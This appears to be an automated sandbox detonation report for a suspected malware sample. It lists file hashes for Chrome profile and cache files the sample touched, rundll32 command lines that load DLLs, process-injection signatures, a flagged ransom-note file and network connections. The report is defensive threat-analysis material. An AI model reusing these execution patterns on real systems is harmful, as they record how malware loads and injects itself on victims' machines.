| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | dba47117e58a4c95f60a693acfcd81d6 |
| SHA1 | 1325a6e27ab2409ef24795c0e9bb777e8a05d044 |
| SHA256 | 07fbb63934cc4eec4864b87029864c95298fcb35d017ac49e488585dff2b3bc5 |
| SHA512 | e6f7b71da72f71893bf590d43325078dbcfa202b6959a46fdfd933614ac4639af0bfb12d9859a684d82a753636b6dc9a546c47a3af4ff512ec08f5f83086e749 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2269e6fb00d925f9b840301637d32b71 |
| SHA1 | 02a04bd01cdd665982dc266aad21016fb647e27f |
| SHA256 | 360baaaa33627edf06eb04cc009fa056125214993426aeeb5dc51328e023c54b |
| SHA512 | ea0b786f55f3733fef98ae2d71280001b1eb4827c0884e37ea6ac3a6def3d083df2568e0dbaa3e3b51f4da30eef8b1a8bfd9ba70ec5a8bec2f2ab1502024194d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 63864ed43e5004147163ad1f5c1701f6 |
| SHA1 | 13d50dea98eca9481f4dacb518e8a8157a9f1c2a |
| SHA256 | 3fd036346ceff5464fa87948ab306d966f2ebae9f70f06d662f374b73c7fa9cc |
| SHA512 | 8db95e08010e03248914d2de7a906767b37711bd4af83c0969a0e5137d2fffb0cdfa97bf6867e769e4eb526cff82e4ae03c72e6ae117cd4711e6e2b88067dda0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 20f101bc2c6bc41e8f91fe5278c4056e |
| SHA1 | 546b4b194448147cc711b668ed969a211b3e675e |
| SHA256 | 7a617d4e4a0d9560cfd9e88bbda0f745d1a6a4b97b5ad18f0bd86ecc40958e9a |
| SHA512 | dc79f749d57f3c2ee13ba680564fab29fb97ee85930a38db31f19bade08efe0f881695be69be40af224c4d91418aeadeb2ec977b662e40f514c6a01e55293ec6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 452b01aa9ffd717677accf05f8ae5528 |
| SHA1 | 5db1aa50894c7a16c638ab796031bd17d2dbe7fe |
| SHA256 | 2195dd236c5b9ed6ca06fa47ae0cb39a403a30663c8ad1735e60b4cbab8fbb62 |
| SHA512 | 177d66e0e2e88ca26d0ba91fdb7e45adc498b6177d1d8ea6e9d4f7062b963a1b9de6ec0ba3026eace8f3f423249aa3b3b114c873b16bb343f8af9e8ef5f51bd8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | acf07e6e6c18c7c3e0d1f3a444063acd |
| SHA1 | 83ca2e991993f8d5481cb8f864d10a6d5fab42a5 |
| SHA256 | 14e9b05bbebe5a161c524fce5312e7ab4cc22bd664b9bd63087c138c75927492 |
| SHA512 | 99c448d70ac5185970ec25eb00cfced17f53f8b2ad0a5bf22eee7cdfe93085b0123946f4e0bc6d6e18f4230b78361dc158c65a1c49252a72407b1f06450ebb8b |
C:\Users\Admin\Downloads\Unconfirmed 378584.crdownload
| MD5 | f1320bd826092e99fcec85cc96a29791 |
| SHA1 | c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed |
| SHA256 | ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba |
| SHA512 | c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f9963a1618d6458ee89ae77ac559c8e4 |
| SHA1 | a2b95ca3e9e0d9e5d564f4c04e6c193d35fa0101 |
| SHA256 | bd2bd0dbac571dc8000739d8f61d00a1c0682e44babad869a88c67c3cff8f44d |
| SHA512 | 1d7b4dc00d4a91300c6739a9012f3bf081603e3432a94cb0e49c263e05feefa6b227b1f4f7cc223c5d6228abd3c3fccfd743b6700c351b98386e810385a02209 |
\Program Files\7-Zip\7-zip.dll
| MD5 | 8af282b10fd825dc83d827c1d8d23b53 |
| SHA1 | 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355 |
| SHA256 | 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca |
| SHA512 | cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f9dc26704da07c4fb9b72d27e9f1268e |
| SHA1 | 5beb50fa7dcf9e01aacfe2515014f66510fb985b |
| SHA256 | 3881fb4c16119d039cba801214401ef4bc91c761453b59c72c5c1da23bcdde5c |
| SHA512 | a5e11bc86897bcde36d4a641545504875f71dd7d465d1a6b5461c2ace78558737a2b4d67a8d1c6a2507fcc224cc76b632ad34d98ab5541acf99a8797767ec5eb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4cf58c14f20b0346c58a758fa11bfd2f |
| SHA1 | c142f1e2dd9cecd1de45e83859b294d1bad77229 |
| SHA256 | 832a864e7b95e32c54c933b7767246b05fe3a7bc0b65ae7858833ffcc502e67d |
| SHA512 | 96f572683cd4cdce1654717cb1356fda9d3bb464b657e8a7dcbd20b28e34629cb688c3ad1bf225aef832018871440a6fe49971cbfb28fe8643d8f9645feb8867 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | a0a5ff2e6e9ef7d820ca42d09a660e8c |
| SHA1 | fcb25c451672458b937480a286cd61970b58ba55 |
| SHA256 | 27dd5ae1e86e4ed32fdebff38ed4332a040ce765141b014255377d0315a73a85 |
| SHA512 | 8ea88314261582ff254a5b5885f440299fc8d98be5298b421a381e5d5974667c43ecced1de5aee617d8385ae64def9919f7305d4fc6938b9ac99a3a6cbf7dc5d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a15ac.TMP
| MD5 | 9dae7a25384a7bdd810b501544b77a94 |
| SHA1 | fc55bd5221171dc4e5853cdf3ab39fc3c7560617 |
| SHA256 | 2db0c8d1e0fa0940af7f2e789d2baf8a0d8f12cc38ced16a9289d8ecf3587f16 |
| SHA512 | c33f0668e98e2637065bb0363a8713781749d89cfd424599ea4f5437280e00904a8b03eb07a0ae73afecc1ef24240fd6384d68f7e14fe90931bc02d53552bbf2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 93eeb0756fd70dfb396f659e8cf1b537 |
| SHA1 | 0a2a5391c99e1a3aa230c24667abb645555ba8ba |
| SHA256 | 4ffe7d0b85352781f07c49ce8621aa417db3d2acc246ac5854ae369879852010 |
| SHA512 | 1fd4cd9898a58e2faeb1d96c518b703a9936cc979afafb8aae21ebb6f5be00bac12838359f0c4c49bfb1eff29e1369986731ecc9f05561b326fb219bca5b6d82 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae1bccd6831ebfe5ad03b482ee266e4f |
| SHA1 | 01f4179f48f1af383b275d7ee338dd160b6f558a |
| SHA256 | 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649 |
| SHA512 | baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a4bef.TMP
| MD5 | 0619b3bedb6ecfbeb1af55458dea42e3 |
| SHA1 | 68c3af847e49db57683339d1b768833f7f1e61be |
| SHA256 | bbe84cbe0a63d7dd529b2511a12df1a5608be82bb24e0cd02d6bb92699ee3c09 |
| SHA512 | 9319f1394a6b87a1f427a9b781dce42d7f68c8764062eec8d6500da9ea3e201e3775a1f92796d7f75f63b01223e8a325c769be993ac5fd359d5046fb29ad12e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 34d4b17bd203ac807b6d7cde30599ac0 |
| SHA1 | fc497999b0a269d590317fd3aad1abd96d3a0472 |
| SHA256 | 6b460670ad1c2c0f74c40b66aa24a0cbeebb0b0e95475758ad10911d0939369d |
| SHA512 | dc545ecc2d6c6110a3b0e862097201fa5f0b86c1531a4c4c69b96bbc9e0f8ba5c6f6e9947964ed84c5c9726ff1ca8d3486162e8cbe8d37c77e1fba16aece5626 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 18bba9dd6808199233d001996193daf9 |
| SHA1 | dc5a01485d8334f560daad3555827327dca5e80c |
| SHA256 | 3e9ba9a4e528147effd37ad85a0cc100cfc61c5865d4134ab730ce4ad65c017f |
| SHA512 | b4cb58c597f210db1467b4bc9b72c321b5f314e068cf9819aab875d0d1855109fe483869197bdc29070378161388a182110a43da6dc489235914e739227ca1b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 149e5896f39ea962ee4e43e00cbb719d |
| SHA1 | 61f37f8c76443faf4818fdafd7a586d73da84e56 |
| SHA256 | 7ce5e23f4bfe3c1c0088c614e5be6d55493a3c95bd3124fd94bce0ddfa6c4ce5 |
| SHA512 | b8011e37a38eb17935ded3237a87c53338752b0450315f03cd280a08b5917340933ca75ef4e7eef2f22efb8c715e538a288c9b0df5123c851f256fe8c83a239a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | dcd05c00279183de899bf36573e96657 |
| SHA1 | 1c4dc09532b555ac6669fef9435adfb5e6ce6f51 |
| SHA256 | c59399f40fb66c2de27eee722f846dadeef42e1a65a536d309818ff2153c14b6 |
| SHA512 | 25ccb0f0da41665a69264aa1a74566f198ac037cab105f9ec6f673c31b14f3d88b2b99e1f8c46249d738dba13179f4fdbe04a5ca6a67edd24cd424045a98939f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | a533dbee2b1018dda1d1d70c767981c1 |
| SHA1 | 462c11a894b013cc853daf3f158f4e3fecf5f9cf |
| SHA256 | ba5a4c65fbd05f92399cecb84f2eaf6855ca4d674a25a2a40c109214b2c1aae3 |
| SHA512 | d3283901ba2e26cb538bccb760b905137799c01b9a38d76a259557e6acfb4c4e051a74d8b86f10d8768b3f1cf704dc6a22623b9a9fc1bc367fa26cce9b94a197 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 42722595c5cf2cf703bf0b5b3e213d5a |
| SHA1 | 60b42e133740423754534db5ffd91df6762ac39d |
| SHA256 | 000e35848937e0132ed037079d0adb1a2b444db7f9866e442269f33efc2eaf15 |
| SHA512 | 30e25f1d2f7798c46b0c4c7c2c54edc3a22b668cf69d9daf33885e90fbb10409e457c0ab616a87bfc91db95e9100c5e6bfd0899fdf602ca6a2a244931b9092a1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4332_930806541\Icons Monochrome\16.png
| MD5 | a4fd4f5953721f7f3a5b4bfd58922efe |
| SHA1 | f3abed41d764efbd26bacf84c42bd8098a14c5cb |
| SHA256 | c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3 |
| SHA512 | 7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index
| MD5 | fcb898b34dccc68f1f5744ed54552286 |
| SHA1 | 2eaf8dcd42eb4a35fa6428450878b85a6c668e1d |
| SHA256 | c9cd200684c671e5ed98b8e3e6361186b55380a4fb946336c6b1517a80567063 |
| SHA512 | 1d5e2a01c1d3c24ff5d2f8a31f9b32459fae1fd6b446d177944c98ef717599f6fc5decb770edd43cf047b4d02981bee960b8d98cdeb28eafff0976f0af1fb597 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index~RFe5a6831.TMP
| MD5 | 6cfdd6c65dc3042708071429f7f63d49 |
| SHA1 | 1ba1ca71fe378f2cf0563f504dc4a6d2157e5ec1 |
| SHA256 | bdc17775bd53acc6e492fb9e3b8111b73ab2fb6c79715eb62c517180090471d7 |
| SHA512 | cde1842e43d169025f218d94e9c1a1740972e9088e942eb07f24ca1198fbf166c4b9db3bd54b935b5739ada8a078bb71dd33fbb9d6df746ba227e7e83459058f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022
| MD5 | cd3756106418d9e83a2baff9904ba221 |
| SHA1 | 4c2ed1c1ebe119027db0fbaf7a64b408f1779b4a |
| SHA256 | 57ec0895e1bcaf08c769e2d6872f3f3657972f87fac081063445213dae4541ee |
| SHA512 | 5bf43ccaaf99505f7e8ecf2eda18efe260125accbc12f655601e2acabd822513e153f4b81cbf03a65d13572f11e9f13fd471006a0ce8f2665e8a594ff2d769dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b6076ddd0896c4ef07d9d907ec0ccffe |
| SHA1 | 83ef97d88f6ca25b1781587040ca676da4187228 |
| SHA256 | 3137611b3a24ea83c7eff1df6226b4594b2da048759bbf7cf8f69505f9c4e773 |
| SHA512 | 1140f45c628e1ac5f114f443fae946a08d86013fd5f05f2a1f2718df9346efb3b2eb02989119b49a92c4f69b7147aeae9c48827e23902c14965b6bad4c5d9e32 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | e43b5a9489450c3a906ac4e5ec6d6edd |
| SHA1 | c0b6511fb9a8b6aff4f152c792a98d31fcadcb07 |
| SHA256 | aa61cbed1515ade8c09e95bd423ca53e6b002388641e93996f01929b38795d0c |
| SHA512 | 6a88c8bba007dd9ec99cbbfee1e7bf40caf7c6e9a9f597e351656054fc3b06ed0a14f4b37c9015c50bdc47448623422e34b9dc02a5cfb98433016494166e40f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | fc4387d666a2d5d88dd7f74c8f9d68b8 |
| SHA1 | 06214eb04646b1904b6073e484ba222f161f37be |
| SHA256 | a4d93d9aacd6b97422248a1dcdb7cf74bec3e4ba58e6397e2c17a8137085fd8b |
| SHA512 | ae228fb9c460f4a435485322a57d7a54d1be8c8ddc759666368959bd9c505c6e316f035c059ef3c04d10cd32db434947bf5cf5904658c8a0393b80af7c6d83ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 87aef95f72269523be9295d2b6d91147 |
| SHA1 | 48bd563631f121b991ee40998c6bf7979b5326f0 |
| SHA256 | 5050093b05eeafccae81c6a349499cab79989997e04f01338fb258afda5e48ac |
| SHA512 | 775ea3909c57003b3f7448abb1f7c186127fb429b9c863f8a9001e818ff6227fe51e1d2e941344295d0b9e8045d10477a5c03284d9726db797fa1d79306bb86d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f
| MD5 | c0637a08f2ba40c56260782d2bb3ace4 |
| SHA1 | a2bf4298414a764ff1342b3f48f45b4dc1669a96 |
| SHA256 | d6ab12688ec8cfe7f9235b18c7d7a4730d86278ba1efae0d715c0d054465781e |
| SHA512 | 736d1ac8987102028baef59d43ceb2fde71b3aab2f8f2d8d306846a457e2ac224908968ff7bfe34bb05beb7998223d393244cf5da84f9d64f8b71c9f0b2ca6e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021
| MD5 | af5bf693b92c0d2c8441b3a6640c4ad8 |
| SHA1 | 12ed4ac73239e542ab8d7fa191dddc779808e202 |
| SHA256 | b9f2c3f2ec75955d96309f759eaf9fb6bf576c238377491dbb92de1768a26012 |
| SHA512 | c2ef099832fc5e8f1e67acbd550b0590c0fb5c291761280a2e74e6a97763906b9c0c1a2295f285462ba3a0ed7cd5658f296e5f0f9c5d11a97ba210f352f8a438 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c
| MD5 | 127b7a9f7009939d0ae5dd1a48386985 |
| SHA1 | f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac |
| SHA256 | 9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962 |
| SHA512 | b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f59459fcda8df0c834f4ab23336c96e7 |
| SHA1 | e2c5ce89cd38fdab552008015426fdca30f15c07 |
| SHA256 | 96c32d5c4b8c6c59713aaac3f3d43ddfcd37ddf548feffbc75b1d1fd21dba1cb |
| SHA512 | f0498022c2d5a66f66088390ba793df030bbdf614f723b3038e624992fac1c19c36a61177d5893e8da046e6a7fa1315f263789fb534a5190439466f5d763f8c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7109a0b4eb6d946ff017179aa1387fbc |
| SHA1 | ad6d5de96c35028c4350b7d1b39e28b0b9a1c0f1 |
| SHA256 | a4c4ed07cf8c104977ff5d6d45d57e746fc067528a8e2b51e6affd9393f16939 |
| SHA512 | 17d211bc4aab2bc82429955e6e77caf7ac4e48420b7fd70eda9f19713d24d4f42f92957b052586bea75519a77b81c72604dd8a5fa0b29dca15aafee1f6f0fd6d |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
136s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
133s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240611-en
Max time kernel
52s
Max time network
61s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3360 wrote to memory of 4712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1
Network
| Country | Destination | Domain | Proto |
| GB | 87.248.205.0:80 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
132s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:14
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |